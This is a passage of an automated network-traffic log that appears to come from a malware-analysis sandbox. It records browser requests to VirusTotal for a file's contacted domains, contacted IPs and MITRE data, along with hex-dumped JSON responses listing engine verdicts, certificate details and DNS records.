                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "Cyan": { "method": "blacklist", "engine_name": "Cyan", "category": "
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1280INData Raw: 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 44 72 2e 57 65 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6d 73 69 73 6f 66 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Dr.Web", "category": "harmless", "result": "clean" }, "Emsisoft": { "method": "blacklist", "eng
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 46 65 6f 64 6f 20 54 72 61 63 6b 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 46 65 6f 64 6f 20 54 72 61 63 6b 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "Feodo Tracker": { "method": "blacklist", "engine_name": "Feodo Tracker",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    206192.168.2.164996474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC961OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTY3ODY2ODY3MzctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a725c512a32238c2be4a50791679b07d
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 325943
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 64 6f 6d 61 69 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 64 6f 6d 61 69 6e 73 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "accounts.google.com", "type": "domain", "links": { "self": "https://www.virustotal.com/ui/domains/accounts.google.com" }, "attributes": {
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 54 68 72 65 61 74 53 65 65 6b 65 72 22 3a 20 22 73 65 61 72 63 68 20 65 6e 67 69 6e 65 73 20 61 6e 64 20 70 6f 72 74 61 6c 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6f 74 61 6c 5f 76 6f 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 31 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 61 6c 69 63 69 6f 75 73 22 3a 20 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 68 74 74 70 73 5f 63 65 72 74 69 66 69 63 61 74 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 65 72
                                                                                                                                                                                                                    Data Ascii: ThreatSeeker": "search engines and portals" }, "total_votes": { "harmless": 10, "malicious": 3 }, "last_https_certificate": { "cer
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC545INData Raw: 39 35 63 64 33 64 39 63 64 30 65 32 34 36 31 34 66 33 37 31 33 35 31 64 32 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 61 63 63 65 73 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4f 43 53 50 22 3a 20 22 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 31 63 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 41 20 49 73 73 75 65 72 73 22 3a 20 22 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 72 65 70 6f 2f 63 65 72 74 73 2f 67 74 73 31 63 33 2e 64 65 72 22 0a
                                                                                                                                                                                                                    Data Ascii: 95cd3d9cd0e24614f371351d27" }, "ca_information_access": { "OCSP": "http://ocsp.pki.goog/gts1c3", "CA Issuers": "http://pki.goog/repo/certs/gts1c3.der"
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 32 2e 32 33 2e 31 34 30 2e 31 2e 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 31 2e 33 2e 36 2e 31 2e 34 2e 31 2e 31 31 31 32 39 2e 32 2e 35 2e 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 72 6c 5f 64 69 73 74 72 69 62 75 74 69 6f 6e 5f 70 6f 69 6e 74 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 63 72 6c 73 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 31 63 33 2f 7a 64 41 54 74 30 45 78 5f 46 6b 2e 63 72 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: 2.23.140.1.2.1", "1.3.6.1.4.1.11129.2.5.3" ], "crl_distribution_points": [ "http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl" ],
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 4f 22 3a 20 22 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 4e 22 3a 20 22 47 54 53 20 43 41 20 31 43 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 75 62 6a 65 63 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 4e 22 3a 20 22 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: "O": "Google Trust Services LLC", "CN": "GTS CA 1C3" }, "subject": { "CN": "accounts.google.com" } }, "
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1280INData Raw: 6e 20 53 74 61 74 75 73 3a 20 73 65 72 76 65 72 55 70 64 61 74 65 50 72 6f 68 69 62 69 74 65 64 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 70 70 23 73 65 72 76 65 72 55 70 64 61 74 65 50 72 6f 68 69 62 69 74 65 64 29 5c 6e 44 6f 6d 61 69 6e 20 53 74 61 74 75 73 3a 20 73 65 72 76 65 72 55 70 64 61 74 65 50 72 6f 68 69 62 69 74 65 64 20 68 74 74 70 73 3a 2f 2f 69 63 61 6e 6e 2e 6f 72 67 2f 65 70 70 23 73 65 72 76 65 72 55 70 64 61 74 65 50 72 6f 68 69 62 69 74 65 64 5c 6e 4e 61 6d 65 20 53 65 72 76 65 72 3a 20 4e 53 31 2e 47 4f 4f 47 4c 45 2e 43 4f 4d 5c 6e 4e 61 6d 65 20 53 65 72 76 65 72 3a 20 4e 53 32 2e 47 4f 4f 47 4c 45 2e 43 4f 4d 5c 6e 4e 61 6d 65 20 53 65 72 76 65 72 3a 20 4e 53 33 2e 47 4f 4f 47 4c 45 2e 43 4f 4d 5c
                                                                                                                                                                                                                    Data Ascii: n Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)\nDomain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited\nName Server: NS1.GOOGLE.COM\nName Server: NS2.GOOGLE.COM\nName Server: NS3.GOOGLE.COM\
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 20 20 20 20 22 73 75 73 70 69 63 69 6f 75 73 22 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 32 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 36 38 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 64 6e 73 5f 72 65 63 6f 72 64 73 5f 64 61 74 65 22 3a 20 31 37 31 34 30 30 35 31 32 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6a 61 72 6d 22 3a 20 22 32 37 64 34 30 64 34 30 64 32 39 64 34 30 64 31 64 63 34 32 64 34 33 64 30 30 30 34
                                                                                                                                                                                                                    Data Ascii: "suspicious": 1, "undetected": 21, "harmless": 68, "timeout": 0 }, "last_dns_records_date": 1714005126, "jarm": "27d40d40d29d40d1dc42d43d0004
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 74 6c 22 3a 20 36 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 69 6f 72 69 74 79 22 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 22 67 6d 72 2d 73 6d 74 70 2d 69 6e 2e 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 41 41 41 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 74 6c 22 3a 20 33 30 30 2c 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "ttl": 66, "priority": 5, "value": "gmr-smtp-in.l.google.com" }, { "type": "AAAA", "ttl": 300,
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1280INData Raw: 61 6d 65 22 3a 20 22 30 78 53 49 5f 66 33 33 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 62 75 73 69 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: ame": "0xSI_f33d", "category": "undetected", "result": "unrated" }, "Abusix": { "method": "blacklist", "engine_name": "
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 70 68 61 4d 6f 75 6e 74 61 69 6e 2e 61 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 61 6c 70 68 61 4d 6f 75 6e 74 61
                                                                                                                                                                                                                    Data Ascii: , "category": "harmless", "result": "clean" }, "alphaMountain.ai": { "method": "blacklist", "engine_name": "alphaMounta


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    207192.168.2.164996374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC962OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/mitre_format?link=true HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTUwNzQ0MTQ1NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQx
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC806INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 62c72397acacf96181028ea8bf78cf2c
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 116
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC116INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "AuthenticationRequiredError", "message": "Authentication required" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    208192.168.2.164996774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTU2NDQyNTM2MTYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7b192778193ce756496e51c078b0caf2
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 270450
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 31 30 33 2e 33 35 2e 31 38 38 2e 39 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 70 5f 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 69 70 5f 61 64 64 72 65 73 73 65 73 2f 31 30 33 2e 33 35 2e 31 38 38 2e 39 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "103.35.188.98", "type": "ip_address", "links": { "self": "https://www.virustotal.com/ui/ip_addresses/103.35.188.98" }, "attributes": {
